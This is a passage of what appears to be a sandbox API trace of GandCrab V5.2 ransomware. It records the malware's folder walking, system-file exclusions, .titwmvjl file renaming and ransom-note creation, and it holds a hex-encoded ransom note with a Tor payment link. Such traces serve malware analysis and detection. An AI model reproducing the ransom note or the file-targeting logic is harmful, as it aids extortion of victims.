77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.299] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0072.299] CloseHandle (hObject=0x2bc) returned 1 [0072.301] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.301] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.301] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x26d)) [0072.301] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.302] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.302] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.302] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\d2ca4a09d2ca4deb61a.lock") returned 76 [0072.302] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\mmc\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0072.303] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.303] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.303] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\") returned 52 [0072.303] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\*" [0072.303] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503578 [0072.303] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.303] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.304] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.304] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.304] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.304] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.304] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.304] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\d2ca4a09d2ca4deb61a.lock" [0072.304] lstrlenW (lpString=".titwmvjl") returned 9 [0072.304] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\d2ca4a09d2ca4deb61a.lock") returned 76 [0072.304] VirtualAlloc (lpAddress=0x0, dwSize=0xd8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.304] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 85 [0072.304] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\d2ca4a09d2ca4deb61a.lock") returned 76 [0072.304] lstrlenW (lpString=".lock") returned 5 [0072.304] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.305] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.305] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.305] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.305] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.305] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.305] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.305] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\TITWMVJL-DECRYPT.txt" [0072.305] lstrlenW (lpString=".titwmvjl") returned 9 [0072.305] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\TITWMVJL-DECRYPT.txt") returned 72 [0072.305] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.305] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 81 [0072.305] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\TITWMVJL-DECRYPT.txt") returned 72 [0072.305] lstrlenW (lpString=".txt") returned 4 [0072.306] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.306] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.306] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.306] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.306] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\TITWMVJL-DECRYPT.txt") returned 72 [0072.306] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\TITWMVJL-DECRYPT.txt") returned 72 [0072.306] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.306] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.306] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.306] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.306] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.306] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.306] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.306] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.306] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.306] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0072.306] FindClose (in: hFindFile=0x503578 | out: hFindFile=0x503578) returned 1 [0072.307] CloseHandle (hObject=0x2bc) returned 1 [0072.307] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0072.307] lstrcmpW (lpString1="MS Project", lpString2=".") returned 1 [0072.307] lstrcmpW (lpString1="MS Project", lpString2="..") returned 1 [0072.307] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\", lpString2="MS Project" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project" [0072.307] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\" [0072.307] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.307] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.307] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.308] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.308] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.308] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.308] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.308] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.308] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.308] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.308] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.309] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\\\TITWMVJL-DECRYPT.txt") returned 80 [0072.309] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\ms project\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0072.309] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x7